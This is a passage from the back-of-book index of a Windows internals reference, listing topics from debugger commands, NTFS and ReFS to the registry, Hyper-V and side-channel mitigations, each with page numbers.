command line, activating apps through, 261–262
Command Prompt, 833, 845
commands
!acpiirqarb, 49
!alpc, 224
!apciirqarb, 48
!apic, 37
!arbiter, 48
bcdedit, 398–399
Bootim.exe, 832
cd, 144, 832
!chksvctbl, 103
cmd, 253, 261, 275, 289, 312, 526, 832
db, 102
defrag.exe, 646
!devhandles, 151
!devnode, 49
!devobj, 48
dg, 7–8
dps, 102–103
dt, 7–8
dtrace, 527
.dumpdebug, 547
dx, 7, 35, 46, 137, 150, 190
.enumtag, 547
eventvwr, 288, 449
!exqueue, 83
fsutil resource, 693
fsutil storagereserve findById, 687
g, 124, 241
Get-FileStorageTier, 649
Get-VMPmemController, 737
!handle, 149
!idt, 34, 38, 46
!ioapic, 38
!irql, 41
k, 485
link.exe/dump/loadconfig, 379
!locks, 198
msinfo32, 312, 344
notepad.exe, 405
!object, 137–138, 151, 223
perfmon, 505, 519
!pic, 37
!process, 190
!qlocks, 176
!reg openkeys, 417
regedit.exe, 468, 484, 542
Runas, 397
Set-PhysicalDisk, 774
taskschd.msc, 479, 484
!thread, 75, 190
.tss, 8
Wbemtest, 491
wnfdump, 237
committing a transaction, 697
Composition object, 129
compressing
nonsparse data, 673–674
sparse data, 671–672
compression and ghosting, ReFS (Resilient File System), 769–770
compression and sparse files, NTFS, 637
condition variables, 205–206
connection ports, dumping, 223–224
container compaction, ReFS (Resilient File System), 766–769
container isolation, support for, 626
contiguous file, 643
copying
to and from cache, 584
encrypted files, 717
CoreMessaging object, 130
corruption record, NTFS recovery support, 708
CoverageSampler object, 129
CPL (Code Privilege Level), 6
CPU branch predictor, 11–12
CPU cache(s), 9–10, 12–13
crash dump files, WER (Windows Error Reporting), 543–548
crash dump generation, WER (Windows Error Reporting), 548–551
crash report generation, WER (Windows Error Reporting), 538–542
crashes, consequences of, 421
critical sections, 203–204
CS (Code Segment)), 31
Csrss, 830–835, 838–840
D
data compression and sparse files, NTFS, 670–671
data redundancy and fault tolerance, 629–630
data streams, NTFS, 631–632
data structures, 184–189
DAX (Direct Access Disks). See also disks
block volumes, 728–730
cached and noncached I/O in volume, 723–724
driver model, 721–722
file system filter driver, 730–731
large and huge pages support, 732–735
mapping executable images, 724–728
overview, 720–721
virtual PMs and storage spaces support, 736–739
volumes, 722–724
DAX file alignment, 733–735
DAX mode I/Os, flushing, 731
db command, 102
/debug switch, FsTool, 734
debugger
breakpoints, 87–88
objects, 241–242
!pte extension, 735
!trueref command, 148
debugging. See also user-mode debugging
object handles, 158
trustlets, 374–375
WoW64 in ARM64 environments, 122–124
decryption process, 715–716
defrag.exe command, 646
defragmentation, NTFS, 643–645
Delete method, 141
Dependency Mini Repository, 255
Desktop object, 129
!devhandles command, 151
\Device directory, 161
device shims, 564
!devnode command, 49
!devobj command, 48
dg command, 4, 7–8
Directory object, 129
disk I/Os, counting, 601
disks, defined, 565. See also DAX (Direct Access Disks)
dispatcher routine, 121
DLLs
Hvloader.dll, 811
IUM (Isolated User Mode), 371–372
Ntevt.dll, 497
for Wow64, 104–105
DMA (Direct Memory Access), 50, 584–585
DMTF, WMI (Windows Management Instrumentation), 486, 489
DPC (dispatch or deferred procedure call) interrupts, 54–61, 71. See also
software interrupts
DPC Watchdog, 59
dps (dump pointer symbol) command, 102–103
drive-letter name resolution, 620
\Driver directory, 161
driver loading in safe mode, 848–849
driver objects, 451
driver shims, 560–563
\DriverStore(s) directory, 161
dt command, 7, 47
DTrace (dynamic tracing)
ETW provider, 533–534
FBT (Function Boundary Tracing) provider, 531–533
initialization, 529–530
internal architecture, 528–534
overview, 525–527
PID (Process) provider, 531–533
symbol server, 535
syscall provider, 530
type library, 534–535
dtrace command, 527
.dump command, LiveKd, 545
dump files, 546–548
Dump method, 141
.dumpdebug command, 547
Duplicate object service, 136
DVRT (Dynamic Value Relocation Table), 23–24, 26
dx command, 7, 35, 46, 137, 150, 190
Dxgk* objects, 129
dynamic memory, tracing, 532–533
dynamic partitioning, NTFS, 646–647
E
EFI (Extensible Firmware Interface), 777
EFS (Encrypting File System)
architecture, 712
BitLocker encryption offload, 717–718
decryption process, 715–716
described, 640
first-time usage, 713–715
information and key entries, 713
online support, 719–720
overview, 710–712
recovery agents, 714
EFS information, viewing, 716
EIP program counter, 8
enclave configuration, dumping, 379–381
encrypted files
backing up, 716–717
copying, 717
encrypting file data, 714–715
encryption NTFS, 640
encryption support, online, 719–720
EnergyTracker object, 130
enhanced timers, 78–81. See also timers
/enum command-line parameter, 786
.enumtag command, 547
Error Reporting. See WER (Windows Error Reporting)
ETL file, decoding, 514–515
ETW (Event Tracing for Windows). See also tracing dynamic memory
architecture, 500
consuming events, 512–515
events decoding, 513–515
Global logger and autologgers, 521
and high-frequency timers, 68–70
initialization, 501–502
listing processes activity, 510
logger thread, 511–512
overview, 499–500
providers, 506–509
providing events, 509–510
security, 522–525
security registry key, 503
sessions, 502–506
system loggers, 516–521
ETW provider, DTrace (dynamic tracing), 533–534
ETW providers, enumerating, 508
ETW sessions
default security descriptor, 523–524
enumerating, 504–506
ETW_GUID_ENTRY data structure, 507
ETW_REG_ENTRY, 507
EtwConsumer object, 129
EtwRegistration object, 129
Event Log provider DLL, 497
Event object, 128
Event Viewer tool, 288
eventvwr command, 288, 449
ExAllocatePool function, 26
exception dispatching, 85–91
executive mutexes, 196–197
executive objects, 126–130
executive resources, 197–199
exFAT, 606
explicit file I/O, 619–622
export thunk, 117
!exqueue command, 83
F
F5 key, 124, 397
fast I/O, 585–586. See also I/O system
fast mutexes, 196–197
fast repair and check-disk, NTFS recovery support, 707–710
Fast Startup and hibernation, 840–844
FAT12, FAT16, FAT32, 603–606
FAT64, 606
Fault Reporting process, WER (Windows Error Reporting), 540
fault tolerance and data redundancy, NTFS, 629–630
FCB (File Control Block), 571
FCB Headers, 201
feature settings and values, 22–23
FEK (File Encryption Key), 711
file data, encrypting, 714–715
file names, NTFS on-disk structure, 664–666
file namespaces, 664
File object, 128
file record numbers, NTFS on-disk structure, 660
file records, NTFS on-disk structure, 661–663
file system drivers, 583
file system formats, 566
file system interfaces, 582–585
File System Virtualization, 248
file systems
CDFS, 602
data-scan sections, 624–625
drivers architecture, 608
exFAT, 606
explicit file I/O, 619–622
FAT12, FAT16, FAT32, 603–606
filter drivers, 626
filter drivers and minifilters, 623–626
filtering named pipes and mailslots, 625
FSDs (file system drivers), 608–617
mapped page writers, 622
memory manager, 622
NTFS file system, 606–607
operations, 618
Process Monitor, 627–628
ReFS (Resilient File System), 608
remote FSDs, 610–617
reparse point behavior, 626
UDF (Universal Disk Format), 603
\FileSystem directory, 161
fill buffers, 17
Filter Manager, 626
FilterCommunicationPort object, 130
FilterConnectionPort object, 130
Flags, 132
flushing mapped files, 595–596
Foreshadow (L1TF) attack, 16
fragmented file, 643
FSCTL (file system control) interface, 688
FSDs (file system drivers), 608–617
FsTool, /debug switch, 734
fsutil resource command, 693
fsutil storagereserve findById command, 687
G
g command, 124, 241
gadgets, 15
GDI/User objects, 126–127. See also user-mode debugging
GDT (Global Descriptor Table), 2–5
Get-FileStorageTier command, 649
Get-VMPmemController command, 737
Gflags.exe, 554–557
GIT (Generic Interrupt Timer), 67
\GLOBAL?? directory, 161
global flags, 554–557
global namespace, 167
GPA (guest physical address), 17
GPIO (General Purpose Input Output), 51
GSIV (global system interrupt vector), 32, 51
guarded mutexes, 196–197
GUI thread, 96
H
HAM (Host Activity Manager), 244, 249–251
!handle command, 149
Handle count, 132
handle lists, single instancing, 165
handle tables, 146, 149–150
handles
creating maximum number of, 147
viewing, 144–145
hard links, NTFS, 634
hardware indirect branch controls, 21–23
hardware interrupt processing, 32–35
hardware side-channel vulnerabilities, 9–17
hibernation and Fast Startup, 840–844
high-IRQL synchronization, 172–177
hive handles, 410
hives. See also registry
loading, 421
loading and unloading, 408
reorganization, 414–415
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot registry key, 848
HPET (High Performance Event Timer), 67
hung program screen, 838
HungAppTimeout, 839
HVCI (Hypervisor Enforced Code Integrity), 358
hybrid code address range table, dumping, 117–118
hybrid shutdown, 843–844
hypercalls and hypervisor TLFS (Top Level Functional Specification),
299–300
Hyper-V schedulers. See also Windows hypervisor
classic, 289–290
core, 291–294
overview, 287–289
root scheduler, 294–298
SMT system, 292
hypervisor debugger, connecting, 275–277
hypervisor loader boot module, 811–813
I
IBPB (Indirect Branch Predictor Barrier), 22, 25
IBRS (Indirect Branch Restricted Speculation), 21–22, 25
IDT (interrupt dispatch table), 32–35
!idt command, 34, 38, 46
images starting automatically, 837
Import Optimization and Retpoline, 23–26
indexing facility, NTFS, 633, 679–680
Info mask, 132
Inheritance object service, 136
integrated scheduler, 294
interlocked operations, 172
interrupt control flow, 45
interrupt dispatching
hardware interrupt processing, 32–35
overview, 32
programmable interrupt controller architecture, 35–38
software IRQLs (interrupt request levels), 38–50
interrupt gate, 32
interrupt internals, examining, 46–50
interrupt objects, 43–50
interrupt steering, 52
interrupt vectors, 42
interrupts
affinity and priority, 52–53
latency, 50
masking, 39
I/O system, components of, 652. See also Fast I/O
IOAPIC (I/O Advanced Programmable Interrupt Controller), 32, 36
!ioapic command, 38
IoCompletion object, 128
IoCompletionReserve object, 128
Ionescu, Alex, 28
IRPs (I/O request packets), 567, 583, 585, 619, 621–624, 627, 718
IRQ affinity policies, 53
IRQ priorities, 53
IRQL (interrupt request levels), 347–348. See also software IRQLs (interrupt
request levels)
!irql command, 41
IRTimer object, 128
iSCSI, booting from, 811
isolation, NTFS on-disk structure, 689–690
ISR (interrupt service routine), 31
IST (Interrupt Stack Table), 7–9
IUM (Isolated User Mode)
overview, 371–372
SDF (Secure Driver Framework), 376
secure companions, 376
secure devices, 376–378
SGRA (System Guard Runtime attestation), 386–390
trustlets creation, 372–375
VBS-based enclaves, 378–386
J
jitted blocks, 115, 117
jitting and execution, 121–122
Job object, 128
K
k command, 485
Kali Linus, 247
KeBugCheckEx system function, 32
KEK (Key Exchange Key), 783
kernel. See also Secure Kernel
dispatcher objects, 179–181
objects, 126
spinlocks, 174
synchronization mechanisms, 179
kernel addresses, mapping, 20
kernel debugger
!handle extension, 125
!locks command, 198
searching for open files with, 151–152
viewing handle table with, 149–150
kernel logger, tracing TCP/IP activity with, 519–520
Kernel Patch Protection, 24
kernel reports, WER (Windows Error Reporting), 551
kernel shims
database, 559–560
device shims, 564
driver shims, 560–563
engine initialization, 557–559
shim database, 559–560
witnessing, 561–563
kernel-based system call dispatching, 97
kernel-mode debugging events, 240
\KernelObjects directory, 161
Key object, 129
keyed events, 194–196
KeyedEvent object, 128
KilsrThunk, 33
KINTERRUPT object, 44, 46
\KnownDlls directory, 161
\KnownDlls32 directory, 161
KPCR (Kernel Processor Control Region), 4
KPRCB fields, timer processing, 72
KPTI (Kernel Page Table Isolation ), 18
KTM (Kernel Transaction Manager), 157, 688
KVA Shadow, 18–21
L
L1TF (Foreshadow) attack, 16
LAPIC (Local Advanced Programmable Interrupt Controllers), 32
lazy jitter, 119
lazy segment loading, 6
lazy writing
disabling, 595
and write-back caching, 589–595
LBA (logical block address), 589
LCNs (logical cluster numbers), 656–658
leak detections, ReFS (Resilient File System), 761–762
leases, 614–615, 617
LFENCE, 23
LFS (log file service), 652, 695–697
line-based versus message signaled-based interrupts, 50–66
link tracking, NTFS, 639
link.exe tool, 117, 379
link.exe/dump/loadconfig command, 379
LiveKd, .dump command, 545
load ports, 17
loader issues, troubleshooting, 556–557
Loader Parameter block, 819–821
local namespace, 167
local procedure call
ALPC direct event attribute, 222
ALPC port ownership, 220
asynchronous operation, 214–215
attributes, 216–217
blobs, handles, and resources, 217–218
connection model, 210–212
debugging and tracing, 222–224
handle passing, 218–219
message model, 212–214
overview, 209–210
performance, 220–221
power management, 221
security, 219–220
views, regions, and sections, 215–216
Lock, 132
!locks command, kernel debugger, 198
log record types, NTFS recovery support, 697–699
$LOGGED_UTILITY_STREAM attribute, 663
logging implementation, NTFS on-disk structure, 693
Low-IRQL synchronization. See also synchronization
address-based waits, 202–203
condition variables, 205–206
critical sections, 203–204
data structures, 184–194
executive resources, 197–202
kernel dispatcher objects, 179–181
keyed events, 194–196
mutexes, 196–197
object-less waiting (thread alerts), 183–184
overview, 177–179
run once initialization, 207–208
signalling objects, 181–183
(SRW) Slim Reader/Writer locks, 206–207
user-mode resources, 205
LRC parity and RAID 6, 773
LSASS (Local Security Authority Subsystem Service) process, 453, 465
LSN (logical sequence number), 570
M
mailslots and named pipes, filtering, 625
Make permanent/temporary object service, 136
mapped files, flushing, 595–596
mapping and pinning interfaces, caching with, 584
masking interrupts, 39
MBEC (Mode Base Execution Controls), 93
MDL (Memory Descriptor List), 220
MDS (Microarchitectural Data Sampling), 17
Measured Boot, 801–805
media mixer, creating, 165
Meltdown attack, 14, 18
memory, sharing, 171
memory hierarchy, 10
memory manager
modified and mapped page writer, 622
overview, 567
page fault handler, 622–623
memory partitions support, 571–572
metadata
defined, 566, 570
metadata logging, NTFS recovery support, 695
MFT (Master File Table)
NTFS metadata files in, 657
NTFS on-disk structure, 656–660
record for small file, 661
MFT file records, 668–669
MFT records, compressed file, 674
Microsoft Incremental linker ((link.exe)), 117
minifilter driver, Process Monitor, 627–628
Minstore architecture, ReFS (Resilient File System), 740–742
Minstore I/O, ReFS (Resilient File System), 746–748
Minstore write-ahead logging, 758
Modern Application Model, 249, 251, 262
modern boot menu, 832–833. See also boot process
MOF (Managed Object Format), WMI (Windows Management
Instrumentation), 488–495
MPS (Multiprocessor Specification), 35
Msconfig utility, 837
MSI (message signaled interrupts), 50–66
msinfo32 command, 312, 344
MSRs (model specific registers), 92
Mutex object, 128
mutexes, fast and guarded, 196–197
mutual exclusion, 170
N
named pipes and mailslots, filtering, 625
namespace instancing, viewing, 169
\NLS directory, 161
nonarchitectural system service dispatching, 96–97
nonsparse data, compressing, 673–674
notepad.exe command, 405
notifications. See WNF (Windows Notification Facility)
NT kernel, 18–19, 22
Ntdll version list, 106
Ntevt.dll, 497
NTFS bad-cluster recovery, 703–706
NTFS file system
advanced features, 630
change logging, 637–638
compression and sparse files, 637
data redundancy, 629–630
data streams, 631–632
data structures, 654
defragmentation, 643–646
driver, 652–654
dynamic bad-cluster remapping, 633
dynamic partitioning, 646–647
encryption, 640
fault tolerance, 629–630
hard links, 634
high-end requirements, 628
indexing facility, 633
link tracking, 639
metadata files in MFT, 657
overview, 606–607
per-user volume quotas, 638–639
POSIX deletion, 641–643
recoverability, 629
recoverable file system support, 570
and related components, 653
security, 629
support for tiered volumes, 647–651
symbolic links and junctions, 634–636
Unicode-based names, 633
NTFS files, attributes for, 662–663
NTFS information, viewing, 660
NTFS MFT working set enhancements, 571
NTFS on-disk structure
attributes, 667–670
change journal file, 675–679
clusters, 655–656
consolidated security, 682–683
data compression and sparse files, 670–674
on-disk implementation, 691–693
file names, 664–666
file record numbers, 660
file records, 661–663
indexing, 679–680
isolation, 689–690
logging implementation, 693
master file table, 656–660
object IDs, 681
overview, 654
quota tracking, 681–682
reparse points, 684–685
sparse files, 675
Storage Reserves and reservations, 685–688
transaction support, 688–689
transactional APIs, 690
tunneling, 666–667
volumes, 655
NTFS recovery support
analysis pass, 700
bad clusters, 703–706
check-disk and fast repair, 707–710
design, 694–695
LFS (log file service), 695–697
log record types, 697–699
metadata logging, 695
recovery, 699–700
redo pass, 701
self-healing, 706–707
undo pass, 701–703
NTFS reservations and Storage Reserves, 685–688
Ntoskrnl and Winload, 818
NVMe (Non-volatile Memory disk), 565
O
!object command, 137–138, 151, 223
Object Create Info, 132
object handles, 146, 158
object IDs, NTFS on-disk structure, 681
Object Manager
executive objects, 127–130
overview, 125–127
resource accounting, 159
symbolic links, 166–170
Object type index, 132
object-less waiting (thread alerts), 183–184
objects. See also base named objects; private objects; reserve objects
directories, 160–165
filtering, 170
flags, 134–135
handles and process handle table, 143–152
headers and bodies, 131–136
methods, 140–143
names, 159–160
reserves, 152–153
retention, 155–158
security, 153–155
services, 136
signalling, 181–183
structure, 131
temporary and permanent, 155
types, 126, 136–140
\ObjectTypes directory, 161
ODBC (Open Database Connectivity), WMI (Windows Management
Instrumentation), 488
Okay to close method, 141
on-disk implementation, NTFS on-disk structure, 691–693
open files, searching for, 151–152
open handles, viewing, 144–145
Open method, 141
Openfiles/query command, 126
oplocks and FSDs, 611–612, 616
Optimize Drives tool, 644–645
OS/2 operating system, 130
out-of-order execution, 10–11
P
packaged applications. See also apps
activation, 259–264
BI (Background Broker Infrastructure), 256–258
bundles, 265
Centennial, 246–249
Dependency Mini Repository, 255
Host Activity Manager, 249–251
overview, 243–245
registration, 265–266
scheme of lifecycle, 250
setup and startup, 258
State Repository, 251–254
UWP, 245–246
page table, ReFS (Resilient File System), 745–746
PAN (Privileged Access Neven), 57
Parse method, 141
Partition object, 130
partitions
caching and file systems, 565
defined, 565
Pc Reset, 845
PCIDs (Process-Context Identifiers), 20
PEB (process environment block), 104
per-file cache data structures, 579–582
perfmon command, 505, 519
per-user volume quotas, NTFS, 638–639
PFN database, physical memory removed from, 286
PIC (Programmable Interrupt Controller), 35–38
!pic command, 37
pinning and mapping interfaces, caching with, 584
pinning the bucket, ReFS (Resilient File System), 743
PIT (Programmable Interrupt Timer), 66–67
PM (persistent memory), 736
Pointer count field, 132
pop thunk, 117
POSIX deletion, NTFS, 641–643
PowerRequest object, 129
private objects, looking at, 163–164. See also objects
Proactive Scan maintenance task, 708–709
!process command, 190
Process Explorer, 58, 89–91, 144–145, 147, 153–154, 165 169
Process Monitor, 591–594, 627–628, 725–728
Process object, 128, 137
processor execution model, 2–9
processor selection, 73–75
processor traps, 33
Profile object, 130
PSM (Process State Manager), 244
!pte extension of debugger, 735
PTEs (Page table entries), 16, 20
push thunk, 117
pushlocks, 200–202
Q
!qlocks command, 176
Query name method, 141
Query object service, 136
Query security object service, 136
queued spinlocks, 175–176
quota tracking, NTFS on-disk structure, 681–682
R
RAID 6 and LRC parity, 773
RAM (Random Access Memory), 9–11
RawInputManager object, 130
RDCL (Rogue Data Cache load), 14
Read (R) access, 615
read-ahead and write-behind
cache manager disk I/O accounting, 600–601
disabling lazy writing, 595
dynamic memory, 599–600
enhancements, 588–589
flushing mapped files, 595–596
forcing cache to write through disk, 595
intelligent read-ahead, 587–588
low-priority lazy writes, 598–599
overview, 586–587
system threads, 597–598
write throttling, 596–597
write-back caching and lazy writing, 589–594
reader/writer spinlocks, 176–177
ReadyBoost driver service settings, 810
ReadyBoot, 835–836
Reconciler, 419–420
recoverability, NTFS, 629
recoverable file system support, 570
recovery, NTFS recovery support, 699–700. See also WinRE (Windows
Recovery Environment)
redo pass, NTFS recovery support, 701
ReFS (Resilient File System)
allocators, 743–745
architecture’s scheme, 749
B+ tree physical layout, 742–743
compression and ghosting, 769–770
container compaction, 766–769
data integrity scanner, 760
on-disk structure, 751–752
file integrity streams, 760
files and directories, 750
file’s block cloning and spare VDL, 754–757
leak detections, 761–762
Minstore architecture, 740–742
Minstore I/O, 746–748
object IDs, 752–753
overview, 608, 739–740, 748–751
page table, 745–746
pinning the bucket, 743
recovery support, 759–761
security and change journal, 753–754
SMR (shingled magnetic recording) volumes, 762–766
snapshot support through HyperV, 756–757
tiered volumes, 764–766
write-through, 757–758
zap and salvage operations, 760
ReFS files, cloning, 755
!reg openkeys command, 417
regedit.exe command, 468, 484, 542
registered file systems, 613–614
registry. See also hives
application hives, 402–403
cell data types, 411–412
cell maps, 413–414
CLFS (common logging file system), 403–404
data types, 393–394
differencing hives, 424–425
filtering, 422
hive structure, 411–413
hives, 406–408
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot key, 848
incremental logging, 419–421
key control blocks, 417–418
logical structure, 394–401
modifying, 392–393
monitoring activity, 404
namespace and operation, 415–418
namespace redirection, 423
optimizations, 425–426
Process Monitor, 405–406
profile loading and unloading, 397
Reconciler, 419–420
remote BCD editing, 398–399
reorganization, 414–415
root keys, 394–395
ServiceGroupOrder key, 452
stable storage, 418–421
startup and process, 408–414
symbolic links, 410
TxR (Transactional Registry), 403–404
usage, 392–393
User Profiles, 396
viewing and changing, 391–392
virtualization, 422–425
RegistryTransaction object, 129
reparse points, 626, 684–685
reserve objects, 152–153. See also objects
resident and nonresident attributes, 667–670
resource manager information, querying, 692–693
Resource Monitor, 145
Restricted User Mode, 93
Retpoline and Import optimization, 23–26
RH (Read-Handle) access, 615
RISC (Reduced Instruction Set Computing), 113
root directory (\), 692
\RPC Control directory, 161
RSA (Rivest-Shamir-Adleman) public key algorithm, 711
RTC (Real Time Clock), 66–67
run once initialization, 207–208
Runas command, 397
runtime drivers, 24
RW (Read-Write) access, 615
RWH (Read-Write-Handle) access, 615
S
safe mode, 847–850
SCM (Service Control Manager)
network drive letters, 450
overview, 446–449
and Windows services, 426–428
SCM Storage driver model, 722
SCP (service control program), 426–427
SDB (shim database), 559–560
SDF (Secure Driver Framework), 376
searching for open files, 151–152
SEB (System Events Broker), 226, 238
second-chance notification, 88
Section object, 128
sectors
caching and file systems, 565
and clusters on disk, 566
defined, 565
secure boot, 781–784
Secure Kernel. See also kernel
APs (application processors) startup, 362–363
control over hypercalls, 349
hot patching, 368–371
HVCI (Hypervisor Enforced Code Integrity), 358
memory allocation, 367–368
memory manager, 363–368
NAR data structure, 365
overview, 345
page identity/secure PFN database, 366–367
secure intercepts, 348–349
secure IRQLs, 347–348
secure threads and scheduling, 356–358
Syscall selector number, 354
trustlet for normal call, 354
UEFI runtime virtualization, 358–360
virtual interrupts, 345–348
VSM startup, 360–363
VSM system calls, 349–355
Secure Launch, 816–818
security consolidation, NTFS on-disk structure, 682–683
Security descriptor field, 132
\Security directory, 161
Security method, 141
security reference monitor, 153
segmentation, 2–6
self-healing, NTFS recovery support, 706–707
Semaphore object, 128
service control programs, 450–451
service database, organization of, 447
service descriptor tables, 100–104
ServiceGroupOrder registry key, 452
services logging, enabling, 448–449
session namespace, 167–169
Session object, 130
\Sessions directory, 161
Set security object service, 136
/setbootorder command-line parameter, 788
Set-PhysicalDisk command, 774
SGRA (System Guard Runtime attestation), 386–390
SGX, 16
shadow page tables, 18–20
shim database, 559–560
shutdown process, 837–840
SID (security identifier), 162
side-channel attacks
L1TF (Foreshadow), 16
MDS (Microarchitectural Data Sampling), 17
Meltdown, 14
Spectre, 14–16
SSB (speculative store bypass), 16
Side-channel mitigations in Windows
hardware indirect branch controls, 21–23
KVA Shadow, 18–21
Retpoline and import optimization, 23–26
STIPB pairing, 26–30
Signal an object and wait for another service, 136
Sihost process, 834
\Silo directory, 161
SKINIT and Secure Launch, 816, 818
SkTool, 28–29
SLAT (Second Level Address Translation) table, 17
SMAP (Supervisor Mode Access Protection), 57, 93
SMB protocol, 614–615
SMP (symmetric multiprocessing), 171
SMR (shingled magnetic recording) volumes, 762–763
SMR disks tiers, 765–766
Smss user-mode process, 830–835
SMT system, 292
software interrupts. See also DPC (dispatch or deferred procedure call)
interrupts
APCs (asynchronous procedure calls), 61–66
DPC (dispatch or deferred procedure call), 54–61
overview, 54
software IRQLs (interrupt request levels), 38–50. See also IRQL (interrupt
request levels)
Spaces. See Storage Spaces
sparse data, compressing, 671–672
sparse files
and data compression, 670–671
NTFS on-disk structure, 675
Spectre attack, 14–16
SpecuCheck tool, 28–29
SpeculationControl PowerShell script, 28
spinlocks, 172–177
Spot Verifier service, NTFS recovery support, 708
spurious traps, 31
SQLite databases, 252
SRW (Slim Read Writer) Locks, 178, 195, 205–207
SSB (speculative store bypass), 16
SSBD (Speculative Store Bypass Disable), 22
SSD (solid-state disk), 565, 644–645
SSD volume, retrimming, 646
Startup Recovery tool, 846
Startup Repair, 845
State Repository, 251–252
state repository, witnessing, 253–254
STIBP (Single Thread Indirect Branch Predictors), 22, 25–30
Storage Reserves and NTFS reservations, 685–688
Storage Spaces
internal architecture, 771–772
overview, 770–771
services, 772–775
store buffers, 17
stream-based caching, 569
structured exception handling, 85
Svchost service splitting, 467–468
symbolic links, 166
symbolic links and junctions, NTFS, 634–637
SymbolicLink object, 129
symmetric encryption, 711
synchronization. See also Low-IRQL synchronization
High-IRQL, 172–177
keyed events, 194–196
overview, 170–171
syscall instruction, 92
system call numbers, mapping to functions and arguments, 102–103
system call security, 99–100
system call table compaction, 101–102
system calls and exception dispatching, 122
system crashes, consequences of, 421
System Image Recover, 845
SYSTEM process, 19–20
System Restore, 845
system service activity, viewing, 104
system service dispatch table, 96
system service dispatcher, locating, 94–95
system service dispatching, 98
system service handling
architectural system service dispatching, 92–95
overview, 91
system side-channel mitigation status, querying, 28–30
system threads, 597–598
system timers, listing, 74–75. See also timers
system worker threads, 81–85
T
take state segments, 6–9
Task Manager, starting, 832
Task Scheduler
boot task master key, 478
COM interfaces, 486
initialization, 477–481
overview, 476–477
Triggers and Actions, 478
and UBPM (Unified Background Process Manager), 481–486
XML descriptor, 479–481
task scheduling and UBPM, 475–476
taskschd.msc command, 479, 484
TBOOT module, 806
TCP/IP activity, tracing with kernel logger, 519–520
TEB (Thread Environment Block), 4–5, 104
Terminal object, 130
TerminalEventQueue object, 130
thread alerts (object-less waiting), 183–184
!thread command, 75, 190
thread-local register effect, 4. See also Windows threads
thunk kernel routines, 33
tiered volumes. See also volumes
creating maximum number of, 774–775
support for, 647–651
Time Broker, 256
timer coalescing, 76–77
timer expiration, 70–72
timer granularity, 67–70
timer lists, 71
Timer object, 128
timer processing, 66
timer queuing behaviors, 73
timer serialization, 73
timer tick distribution, 75–76
timer types
and intervals, 66–67
and node collection indices, 79
timers. See also enhanced timers; system timers
high frequency, 68–70
high resolution, 80
TLB flushing algorithm, 18, 20–21, 272
TmEn object, 129
TmRm object, 129
TmTm object, 129
TmTx object, 129
Token object, 128
TPM (Trusted Platform Module), 785, 800–801
TPM measurements, invalidating, 803–805
TpWorkerFactory object, 129
TR (Task Register), 6, 32
Trace Flags field, 132
tracing dynamic memory, 532–533. See also DTrace (dynamic tracing); ETW
(Event Tracing for Windows)
transaction support, NTFS on-disk structure, 688–689
transactional APIs, NTFS on-disk structure, 690
transactions
committing, 697
undoing, 702
transition stack, 18
trap dispatching
exception dispatching, 85–91
interrupt dispatching, 32–50
line-based interrupts, 50–66
message signaled-based interrupts, 50–66
trap dispatching (continued)
overview, 30–32
system service handling, 91–104
system worker threads, 81–85
timer processing, 66–81
TRIM commands, 645
troubleshooting Windows loader issues, 556–557
!trueref debugger command, 148
trusted execution, 805–807
trustlets
creation, 372–375
debugging, 374–375
secure devices, 376–378
Secure Kernel and, 345
secure system calls, 354
VBS-based enclaves, 378
in VTL 1, 371
Windows hypervisor on ARM64, 314–315
TSS (Task State Segment), 6–9
.tss command, 8
tunneling, NTFS on-disk structure, 666–667
TxF APIs, 688–690
$TXF_DATA attribute, 691–692
TXT (Trusted Execution Technology), 801, 805–807, 816
type initializer fields, 139–140
type objects, 131, 136–140
U
UBPM (Unified Background Process Manager), 481–486
UDF (Universal Disk Format), 603
UEFI boot, 777–781
UEFI runtime virtualization, 358–363
UMDF (User-Mode Driver Framework), 209
\UMDFCommunicationPorts directory, 161
undo pass, NTFS recovery support, 701–703
unexpected traps, 31
Unicode-based names, NTFS, 633
user application crashes, 537–542
User page tables, 18
UserApcReserve object, 130
user-issued system call dispatching, 98
user-mode debugging. See also debugging; GDI/User objects
kernel support, 239–240
native support, 240–242
Windows subsystem support, 242–243
user-mode resources, 205
UWP (Universal Windows Platform)
and application hives, 402
application model, 244
bundles, 265
and SEB (System Event Broker), 238
services to apps, 243
UWP applications, 245–246, 259–260
V
VACBs (virtual address control blocks), 572, 576–578, 581–582
VBO (virtual byte offset), 589
VBR (volume boot record), 657
VBS (virtualization-based security)
detecting, 344
overview, 340
VSM (Virtual Secure Mode), 340–344
VTLs (virtual trust levels), 340–342
VCNs (virtual cluster numbers), 656–658, 669–672
VHDPMEM image, creating and mounting, 737–739
virtual block caching, 569
virtual PMs architecture, 736
virtualization stack
deferred commit, 339
EPF (enlightened page fault), 339
explained, 269
hardware support, 329–335
hardware-accelerated devices, 332–335
memory access hints, 338
memory-zeroing enlightenments, 338
overview, 315
paravirtualized devices, 331
ring buffer, 327–329
VA-backed virtual machines, 336–340
VDEVs (virtual devices), 326–327
VID driver and memory manager, 317
VID.sys (Virtual Infrastructure Driver), 317
virtual IDE controller, 330
VM (virtual machine), 318–322
VM manager service and worker processes, 315–316
VM Worker process, 318–322, 330
VMBus, 323–329
VMMEM process, 339–340
Vmms.exe (virtual machine manager service), 315–316
VM (View Manager), 244
VMENTER event, 268
VMEXIT event, 268, 330–331
\VmSharedMemory directory, 161
VMXROOT mode, 268
volumes. See also tiered volumes
caching and file systems, 565–566
defined, 565–566
NTFS on-disk structure, 655
setting repair options, 706
VSM (Virtual Secure Mode)
overview, 340–344
startup policy, 813–816
system calls, 349–355
VTLs (virtual trust levels), 340–342
W
wait block states, 186
wait data structures, 189
Wait for a single object service, 136
Wait for multiple objects service, 136
wait queues, 190–194
WaitCompletionPacket object, 130
wall time, 57
Wbemtest command, 491
Wcifs (Windows Container Isolation minifilter driver), 248
Wcnfs (Windows Container Name Virtualization minifilter driver), 248
WDK (Windows Driver Kit), 392
WER (Windows Error Reporting)
ALPC (advanced local procedure call), 209
AeDebug and AeDebugProtected root keys, 540
crash dump files, 543–548
